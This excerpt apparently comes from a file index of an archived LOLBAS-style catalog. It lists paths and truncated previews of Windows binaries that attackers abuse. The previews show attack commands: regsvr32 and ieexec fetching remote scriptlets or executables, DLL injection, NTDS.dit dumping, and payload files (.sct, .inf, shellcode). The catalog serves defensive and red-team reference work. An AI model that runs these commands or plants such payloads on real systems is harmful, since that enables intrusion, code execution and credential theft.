    "path": "Archive-Old-Version/OSBinaries/Diskshadow.exe.md",
    "chars": 533,
    "preview": "## Diskshadow.exe\n* Functions: Execute, Dump NTDS.dit\n```\n\ndiskshadow.exe /s c:\\test\\diskshadow.txt\nExecute commands usi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Dnscmd.exe.md",
    "chars": 985,
    "preview": "## Dnscmd.exe\n* Functions: Execute\n```\n\ndnscmd.exe dc1.lab.int /config /serverlevelplugindll \\\\192.168.0.149\\dll\\wtf.dll"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Esentutl.exe.md",
    "chars": 1150,
    "preview": "## Esentutl.exe\n* Functions: Copy, Download, Write ADS, Read ADS\n```\n\nesentutl.exe /y C:\\folder\\sourcefile.vbs /d C:\\fol"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Expand.exe.md",
    "chars": 660,
    "preview": "## Expand.exe\n* Functions: Download, Copy, Add ADS\n```\n\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\file.bat\nCopies source fi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Explorer.exe.md",
    "chars": 326,
    "preview": "## Explorer.exe\n* Functions: Execute\n```\n\nexplorer.exe calc.exe\nExecutes calc.exe as a subprocess of explorer.exe.\n```\n "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Extexport.exe.md",
    "chars": 471,
    "preview": "## Extexport.exe\n* Functions: Execute\n```\n\nExtexport.exe c:\\test foo bar\nLoad a DLL located in the c:\\\\test folder with "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Extrac32.exe.md",
    "chars": 893,
    "preview": "## Extrac32.exe\n* Functions: Add ADS, Download\n```\n\nextrac32 C:\\ADS\\procexp.cab c:\\ADS\\file.txt:procexp.exe\nExtracts the"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Findstr.exe.md",
    "chars": 997,
    "preview": "## Findstr.exe\n* Functions: Add ADS, Search\n```\n\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\file.exe > c:\\ADS\\file.txt:fi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Forfiles.exe.md",
    "chars": 833,
    "preview": "## Forfiles.exe\n* Functions: Execute, Read ADS\n```\n\nforfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe\nExecutes "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Gpscript.exe.md",
    "chars": 509,
    "preview": "## Gpscript.exe\n* Functions: Execute\n```\n\nGpscript /logon\nExecutes logon scripts configured in Group Policy.\n\nGpscript /"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/IEExec.exe.md",
    "chars": 387,
    "preview": "## IEExec.exe\n* Functions: Execute\n```\n\nieexec.exe http://x.x.x.x:8080/bypass.exe\nExecutes bypass.exe from the remote se"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Ie4unit.exe.md",
    "chars": 496,
    "preview": "## Ie4unit.exe\n* Functions: Execute\n```\n\nie4unit.exe -BaseSettings\nExecutes commands from a specially prepared ie4uinit."
  },
  {
    "path": "Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md",
    "chars": 616,
    "preview": "## InfDefaultInstall.exe\n* Functions: Execute\n```\n\nInfDefaultInstall.exe Infdefaultinstall.inf\nExecutes SCT script using"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/InstallUtil.exe.md",
    "chars": 1049,
    "preview": "## InstallUtil.exe\n* Functions: Execute\n```\n\nInstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll\nExecute t"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Makecab.exe.md",
    "chars": 759,
    "preview": "## Makecab.exe\n* Functions: Package, Add ADS, Download\n```\n\nmakecab c:\\ADS\\autoruns.exe c:\\ADS\\cabtest.txt:autoruns.cab\n"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Mavinject.exe.md",
    "chars": 735,
    "preview": "## Mavinject.exe\n* Functions: Execute, Read ADS\n```\n\nMavInject.exe 3110 /INJECTRUNNING c:\\folder\\evil.dll\nInject evil.dl"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xml",
    "chars": 2914,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<CompilerInput xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xoml",
    "chars": 431,
    "preview": "<SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"MyWorkflow\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xa"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Msbuild.exe.md",
    "chars": 1010,
    "preview": "## Msbuild.exe\n* Functions: Execute\n```\n\nmsbuild.exe pshell.xml\nBuild and execute a C# project stored in the target XML "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Msconfig.exe.md",
    "chars": 395,
    "preview": "## Msconfig.exe\n* Functions: Execute\n```\n\nMsconfig.exe -5\nExecutes command embeded in crafted c:\\windows\\system32\\mscfgt"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Msdt.exe.md",
    "chars": 749,
    "preview": "## Msdt.exe\n* Functions: Execute\n```\n\nOpen .diagcab package\n\n\nmsdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic."
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Msiexec.exe.md",
    "chars": 711,
    "preview": "## Msiexec.exe\n* Functions: Execute\n```\n\nmsiexec /quiet /i cmd.msi\nInstalls the target .MSI file silently.\n\nmsiexec /q /"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Netsh.exe.md",
    "chars": 866,
    "preview": "## Netsh.exe\n* Functions: Execute, Surveillance\n```\n\nnetsh.exe trace start capture=yes filemode=append persistent=yes tr"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Nltest.exe.md",
    "chars": 305,
    "preview": "## Nltest.exe\n* Functions: Credentials\n```\n\nnltest.exe /SERVER:192.168.1.10 /QUERY\n\n```\n   \n* Resources:   \n  * https://"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Openwith.exe.md",
    "chars": 435,
    "preview": "## Openwith.exe\n* Functions: Execute\n```\n\nOpenWith.exe /c C:\\test.hta\nOpens the target file with the default application"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Cmstp.inf",
    "chars": 343,
    "preview": "[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n[DefaultInstall_SingleUser]\nUnRegisterOCXs=UnRegisterOCXSection\n\n[UnRegis"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct",
    "chars": 965,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n<registration \n    progid=\"PoC\"\n    classid=\"{F0001111-0000-0000-0000-0000FEEDACDC}\" >"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Evil.xbap",
    "chars": 175,
    "preview": "private void Button_click(object sender, RoutedEventArgs e)\n{\n\tif (RadioButton1.IsChecked == true)\n\t{\n\t\tProcess.Start(\"C"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall.inf",
    "chars": 215,
    "preview": "[Version] \nSignature=$CHICAGO$\n\n[DefaultInstall]\nUnregisterDlls = Squiblydoo\n\n[Squiblydoo]\n11,,scrobj.dll,2,60,https://r"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall_calc.sct",
    "chars": 354,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n<registration \n    progid=\"PoC\"\n    classid=\"{F0001111-0000-0000-0000-0000FEEDACDC}\" >"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj",
    "chars": 1409,
    "preview": "<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <!-- This inline task execute"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct",
    "chars": 979,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    cla"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml",
    "chars": 344,
    "preview": "\n<?xml version=\"1.0\" encoding=\"utf-16\"?>\n<Answers Version=\"1.0\">\n\t<Interaction ID=\"IT_LaunchMethod\">\n\t\t<Value>ContextMen"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct",
    "chars": 965,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n<registration \n    progid=\"PoC\"\n    classid=\"{F0001111-0000-0000-0000-0000FEEDACDC}\" >"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl",
    "chars": 345,
    "preview": "<?xml version='1.0'?>\n<stylesheet\nxmlns=\"http://www.w3.org/1999/XSL/Transform\" xmlns:ms=\"urn:schemas-microsoft-com:xslt\""
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/file.rsp",
    "chars": 16,
    "preview": "REGSVR evil.dll\n"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml",
    "chars": 247,
    "preview": "<?xml version=\"1.0\" ?>\n<MSCONFIGTOOLS>\n<a NAME=\"LOLBin\" PATH=\"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" D"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Pcalua.exe.md",
    "chars": 572,
    "preview": "## Pcalua.exe\n* Functions: Execute\n```\n\npcalua.exe -a calc.exe\nOpen the target .EXE using the Program Compatibility Assi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Pcwrun.exe.md",
    "chars": 341,
    "preview": "## Pcwrun.exe\n* Functions: Execute\n```\n\nPcwrun.exe c:\\temp\\beacon.exe\nOpen the target .EXE file with the Program Compati"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Powershell.exe.md",
    "chars": 460,
    "preview": "## Powershell.exe\n* Functions: Execute, Read ADS\n```\n\npowershell -ep bypass - < c:\\temp:ttt\nExecute the encoded PowerShe"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/PresentationHost.exe.md",
    "chars": 525,
    "preview": "## PresentationHost.exe\n* Functions: Execute\n```\n\nPresentationhost.exe C:\\temp\\Evil.xbap\nExecutes the target XAML Browse"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Print.exe.md",
    "chars": 750,
    "preview": "## Print.exe\n* Functions: Download, Copy, Add ADS\n```\n\nprint /D:C:\\ADS\\File.txt:file.exe C:\\ADS\\File.exe\nCopy file.exe i"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Psr.exe.md",
    "chars": 584,
    "preview": "## Psr.exe\n* Functions: Surveillance\n```\n\npsr.exe /start /gui 0 /output c:\\users\\user\\out.zip\nCapture screenshots of the"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Regasm.exe.md",
    "chars": 953,
    "preview": "## Regasm.exe\n* Functions: Execute\n```\n\nregasm.exe /U AllTheThingsx64.dll\nLoads the target .DLL file and executes the Un"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md",
    "chars": 396,
    "preview": "## Register-cimprovider.exe\n* Functions: Execute\n```\n\nRegister-cimprovider -path \"C:\\folder\\evil.dll\"\nLoad the target .D"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Regsvcs.exe.md",
    "chars": 854,
    "preview": "## Regsvcs.exe\n* Functions: Execute\n```\n\nregsvcs.exe AllTheThingsx64.dll\nLoads the target .DLL file and executes the Reg"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Regsvr32.exe.md",
    "chars": 636,
    "preview": "## Regsvr32.exe\n* Functions: Execute\n```\n\nregsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll\nExecute the specif"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Replace.exe.md",
    "chars": 531,
    "preview": "## Replace.exe\n* Functions: Copy, Download\n```\n\nreplace.exe C:\\Source\\File.cab C:\\Destination /A\nCopy the specified file"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Robocopy.exe.md",
    "chars": 534,
    "preview": "## Robocopy.exe\n* Functions: Copy\n```\n\nRobocopy.exe C:\\SourceFolder C:\\DestFolder\nCopy the entire contents of the Source"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Rpcping.exe.md",
    "chars": 866,
    "preview": "## Rpcping.exe\n* Functions: Credentials\n```\n\nrpcping -s 127.0.0.1 -t ncacn_np\nSend a RPC test connection to the target s"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Rundll32.exe.md",
    "chars": 2151,
    "preview": "## Rundll32.exe\n* Functions: Execute, Read ADS\n```\n\nrundll32.exe AllTheThingsx64,EntryPoint\nExample command. AllTheThing"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Runonce.exe.md",
    "chars": 480,
    "preview": "## Runonce.exe\n* Functions: Execute\n```\n\nRunonce.exe /AlternateShellStartup\nExecutes a Run Once Task that has been confi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Runscripthelper.exe.md",
    "chars": 688,
    "preview": "## Runscripthelper.exe\n* Functions: Execute\n```\n\nrunscripthelper.exe surfacecheck \\\\?\\C:\\Test\\Microsoft\\Diagnosis\\script"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/SC.exe.md",
    "chars": 500,
    "preview": "## SC.exe\n* Functions: Execute, Read ADS, Create Service, Start Service\n```\n\nsc create evilservice binPath=\"\\\"c:\\\\ADS\\\\f"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Scriptrunner.exe.md",
    "chars": 556,
    "preview": "## Scriptrunner.exe\n* Functions: Execute\n```\n\nScriptrunner.exe -appvscript calc.exe\nExecute calc.exe.\n\nScriptRunner.exe "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/SyncAppvPublishingServer.exe.md",
    "chars": 442,
    "preview": "## SyncAppvPublishingServer.exe\n* Functions: Execute\n```\n\nSyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).Dow"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/WMIC.exe.md",
    "chars": 2536,
    "preview": "## WMIC.exe\n* Functions: Reconnaissance, Execute, Read ADS\n```\n\nwmic.exe process call create calc\nExecute calc.exe.\n\nwmi"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Wab.exe.md",
    "chars": 466,
    "preview": "## Wab.exe\n* Functions: Execute\n```\n\nWab.exe\nLoads a DLL configured in the registry under HKLM.\n```\n   \n* Resources:   \n"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Wscript.exe.md",
    "chars": 306,
    "preview": "## Wscript.exe\n* Functions: Execute, Read ADS\n```\n\nwscript c:\\ads\\file.txt:script.vbs\nExecutes the .VBS script stored as"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Xwizard.exe.md",
    "chars": 676,
    "preview": "## Xwizard.exe\n* Functions: DLL hijack, Execute\n```\n\nxwizard.exe\nXwizard.exe will load a .DLL file located in the same d"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/hh.exe.md",
    "chars": 553,
    "preview": "## hh.exe\n* Functions: Download, Execute\n```\n\nHH.exe http://www.google.com\nOpens google's web page with HTML Help.\n\nHH.e"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/mshta.exe.md",
    "chars": 1255,
    "preview": "## mshta.exe\n* Functions: Execute, Read ADS\n```\n\nmshta.exe evilfile.hta\nOpens the target .HTA and executes embedded Java"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/odbcconf.exe.md",
    "chars": 546,
    "preview": "## odbcconf.exe\n* Functions: Execute\n```\n\nodbcconf -f file.rsp\nLoad DLL specified in target .RSP file.\n```\n   \n* Resourc"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/reg.exe.md",
    "chars": 436,
    "preview": "## reg.exe\n* Functions: Export Reg, Add ADS, Import Reg\n```\n\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ads\\file.txt:"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/regedit.exe.md",
    "chars": 527,
    "preview": "## regedit.exe\n* Functions: Write ADS, Read ADS, Import registry\n```\n\nregedit /E c:\\ads\\file.txt:regfile.reg HKEY_CURREN"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Advpack.dll.md",
    "chars": 1283,
    "preview": "## Advpack.dll\n* Functions: Execute\n```\n\nrundll32.exe advpack.dll,LaunchINFSection c:\\\\test.inf,DefaultInstall_SingleUse"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Ieadvpack.dll.md",
    "chars": 1137,
    "preview": "## Ieadvpack.dll\n* Functions: Execute\n```\n\nrundll32.exe IEAdvpack.dll,LaunchINFSection c:\\\\test.inf,DefaultInstall_Singl"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Ieframe.dll.md",
    "chars": 760,
    "preview": "## Ieframe.dll\n* Functions: Execute\n```\n\nrundll32.exe ieframe.dll,OpenURL \"C:\\test\\calc.url\"\nLaunch an executable payloa"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Mshtml.dll.md",
    "chars": 419,
    "preview": "## Mshtml.dll\n* Functions: Execute\n```\n\nrundll32.exe Mshtml.dll,PrintHTML \"C:\\temp\\calc.hta\"\nInvoke an HTML Application."
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Payload/Advpack.inf",
    "chars": 346,
    "preview": "[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n[DefaultInstall_SingleUser]\nUnRegisterOCXs=UnRegisterOCXSection\n\n[UnRegis"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct",
    "chars": 1116,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    cla"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf",
    "chars": 346,
    "preview": "[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n[DefaultInstall_SingleUser]\nUnRegisterOCXs=UnRegisterOCXSection\n\n[UnRegis"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct",
    "chars": 1116,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    cla"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Pcwutl.dll.md",
    "chars": 377,
    "preview": "## Pcwutl.dll\n* Functions: Execute\n```\n\nrundll32.exe pcwutl.dll,LaunchApplication calc.exe\nLaunch executable by calling "
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Setupapi.dll.md",
    "chars": 946,
    "preview": "## Setupapi.dll\n* Functions: Execute\n```\n\nrundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\\temp\\calc.inf\nLaunc"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Shdocvw.dll.md",
    "chars": 751,
    "preview": "## Shdocvw.dll\n* Functions: Execute\n```\n\nrundll32.exe shdocvw.dll,OpenURL \"C:\\test\\calc.url\"\nLaunch an executable payloa"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Shell32.dll.md",
    "chars": 886,
    "preview": "## Shell32.dll\n* Functions: Execute\n```\n\nrundll32.exe shell32.dll,Control_RunDLL payload.dll\nLaunch DLL payload.\n\nrundll"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Syssetup.dll.md",
    "chars": 843,
    "preview": "## Syssetup.dll\n* Functions: Execute\n```\n\nrundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\\temp\\calc."
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Url.dll.md",
    "chars": 1509,
    "preview": "## Url.dll\n* Functions: Execute\n```\n\nrundll32.exe url.dll,OpenURL \"C:\\\\test\\\\calc.hta\"\nLaunch a HTML application payload"
  },
  {
    "path": "Archive-Old-Version/OSLibraries/Zipfldr.dll.md",
    "chars": 636,
    "preview": "## Zipfldr.dll\n* Functions: Execute\n```\n\nrundll32.exe zipfldr.dll,RouteTheCall calc.exe\nLaunch an executable payload by "
  },
  {
    "path": "Archive-Old-Version/OSScripts/CL_Invocation.ps1.md",
    "chars": 820,
    "preview": "## CL_Invocation.ps1\n* Functions: Execute\n```\n\n. C:\\\\Windows\\\\diagnostics\\\\system\\\\AERO\\\\CL_Invocation.ps1   \\nSyncInvok"
  },
  {
    "path": "Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md",
    "chars": 655,
    "preview": "## CL_Mutexverifiers.ps1\n* Functions: Execute\n```\n\n. C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfte"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Manage-bde.wsf.md",
    "chars": 784,
    "preview": "## Manage-bde.wsf\n* Functions: Execute\n```\n\nset comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manag"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct",
    "chars": 338,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    cla"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Payload/Slmgr.reg",
    "chars": 922,
    "preview": "Windows Registry Editor Version 5.00\n\n[HKEY_CURRENT_USER\\Software\\Classes\\Scripting.Dictionary]\n@=\"\"\n\n[HKEY_CURRENT_USER"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct",
    "chars": 364,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Scripting.Dictionary\"\n    progid=\"Scripting.Dictionary"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Pubprn.vbs.md",
    "chars": 637,
    "preview": "## Pubprn.vbs\n* Functions: Execute\n```\n\npubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct\nSet the 2nd varia"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Slmgr.vbs.md",
    "chars": 520,
    "preview": "## Slmgr.vbs\n* Functions: Execute\n```\n\nreg.exe import c:\\path\\to\\Slmgr.reg & cscript.exe /b c:\\windows\\system32\\slmgr.vb"
  },
  {
    "path": "Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md",
    "chars": 518,
    "preview": "## SyncAppvPublishingServer.vbs\n* Functions: Execute\n```\n\nSyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).Do"
  },
  {
    "path": "Archive-Old-Version/OSScripts/Winrm.vbs.md",
    "chars": 1327,
    "preview": "## Winrm.vbs\n* Functions: Execute\n```\n\nreg.exe import c:\\path\\to\\Slmgr.reg & winrm quickconfig\nHijack the Scripting.Dict"
  },
  {
    "path": "Archive-Old-Version/OSScripts/pester.bat.md",
    "chars": 559,
    "preview": "## pester.bat\n* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.\n``"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/AcroRd32.exe.md",
    "chars": 441,
    "preview": "## AcroRd32.exe\n* Functions: Execute\n```\n\nReplace C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.e"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Gpup.exe.md",
    "chars": 381,
    "preview": "## Gpup.exe\n* Functions: Execute\n```\n\nGpup.exe -w whatever -e c:\\Windows\\System32\\calc.exe\nExecute another command throu"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Nlnotes.exe.md",
    "chars": 526,
    "preview": "## Nlnotes.exe\n* Functions: Execute\n```\n\nNLNOTES.EXE /authenticate \"=N:\\Lotus\\Notes\\Data\\notes.ini\" -Command if((Get-Exe"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Notes.exe.md",
    "chars": 507,
    "preview": "## Notes.exe\n* Functions: Execute\n```\n\nNotes.exe \"=N:\\Lotus\\Notes\\Data\\notes.ini\" -Command if((Get-ExecutionPolicy) -ne "
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Nvudisp.exe.md",
    "chars": 795,
    "preview": "## Nvudisp.exe\n* Functions: Execute, Copy, Add registry, Create shortcut, kill process\n```\n\nNvudisp.exe System calc.exe\n"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Nvuhda6.exe.md",
    "chars": 744,
    "preview": "## Nvuhda6.exe\n* Functions: Execute, Copy, Add registry, Create shortcut, kill process\n```\n\nnvuhda6.exe System calc.exe\n"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/ROCCAT_Swarm.exe.md",
    "chars": 402,
    "preview": "## ROCCAT_Swarm.exe\n* Functions: Execute\n```\n\nReplace ROCCAT_Swarm_Monitor.exe with your binary.exe\nHijack ROCCAT_Swarm_"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Setup.exe.md",
    "chars": 351,
    "preview": "## Setup.exe\n* Functions: Execute\n```\n\nRun Setup.exe\nHijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a pa"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/Usbinst.exe.md",
    "chars": 419,
    "preview": "## Usbinst.exe\n* Functions: Execute\n```\n\nUsbinst.exe InstallHinfSection \"DefaultInstall 128 c:\\temp\\calc.inf\"\nExecute ca"
  },
  {
    "path": "Archive-Old-Version/OtherBinaries/VBoxDrvInst.exe.md",
    "chars": 407,
    "preview": "## VBoxDrvInst.exe\n* Functions: Persistence\n```\n\nVBoxDrvInst.exe driver executeinf c:\\temp\\calc.inf\nSet registry key-val"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Appvlp.exe.md",
    "chars": 885,
    "preview": "## Appvlp.exe\n* Functions: Execute\n```\n\nAppVLP.exe \\\\webdav\\calc.bat\nExecutes calc.bat through AppVLP.exe\n\nAppVLP.exe po"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md",
    "chars": 609,
    "preview": "## Bginfo.exe\n* Functions: Execute\n```\n\nbginfo.exe bginfo.bgi /popup /nolicprompt\nExecute VBscript code that is referenc"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Cdb.exe.md",
    "chars": 624,
    "preview": "## Cdb.exe\n* Functions: Execute\n```\n\ncdb.exe -cf x64_calc.wds -o notepad.exe\nLaunch 64-bit shellcode from the x64_calc.w"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Dxcap.exe.md",
    "chars": 351,
    "preview": "## Dxcap.exe\n* Functions: Execute\n```\n\nDxcap.exe -c C:\\Windows\\System32\\notepad.exe\nLaunch notepad as a subprocess of Dx"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Mftrace.exe.md",
    "chars": 587,
    "preview": "## Mftrace.exe\n* Functions: Execute\n```\n\nMftrace.exe cmd.exe\nLaunch cmd.exe as a subprocess of Mftrace.exe.\n\nMftrace.exe"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Msdeploy.exe.md",
    "chars": 394,
    "preview": "## Msdeploy.exe\n* Functions: Execute\n```\n\nmsdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"c:\\temp\\calc.bat\""
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Payload/Cdb_calc.wds",
    "chars": 4744,
    "preview": "$$ Save this to a file - e.g. x64_calc.wds\n$$ Example: launch this shellcode in a host notepad.exe process.\n$$ cdb.exe -"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/SQLToolsPS.exe.md",
    "chars": 398,
    "preview": "## SQLToolsPS.exe\n* Functions: Execute, evade logging\n```\n\nSQLToolsPS.exe -noprofile -command Start-Process calc.exe\nRun"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Sqldumper.exe.md",
    "chars": 799,
    "preview": "## Sqldumper.exe\n* Functions: Dump process\n```\n\nsqldumper.exe 464 0 0x0110\nDump process by PID and create a dump file (A"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Sqlps.exe.md",
    "chars": 375,
    "preview": "## Sqlps.exe\n* Functions: Execute, evade logging\n```\n\nSqlps.exe -noprofile\nDrop into a SQL Server PowerShell console wit"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/Tracker.exe.md",
    "chars": 463,
    "preview": "## Tracker.exe\n* Functions: Execute\n```\n\nTracker.exe /d .\\calc.dll /c C:\\Windows\\write.exe\nUse tracker.exe to proxy exec"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/csi.exe.md",
    "chars": 527,
    "preview": "## csi.exe\n* Functions: Execute\n```\n\ncsi.exe file\nUse csi.exe to run unsigned C# code.\n```\n   \n* Resources:   \n  * https"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/dnx.exe.md",
    "chars": 368,
    "preview": "## dnx.exe\n* Functions: Execute\n```\n\ndnx.exe consoleapp\nExecute C# code located in the consoleapp folder via 'Program.cs"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/msxsl.exe.md",
    "chars": 668,
    "preview": "## msxsl.exe\n* Functions: Execute\n```\n\nmsxsl.exe customers.xml script.xsl\nRun COM Scriptlet code within the script.xsl f"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/rcsi.exe.md",
    "chars": 311,
    "preview": "## rcsi.exe\n* Functions: Execute\n```\n\nrcsi.exe bypass.csx\nUse embedded C# within the csx script to execute the code.\n```"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/te.exe.md",
    "chars": 313,
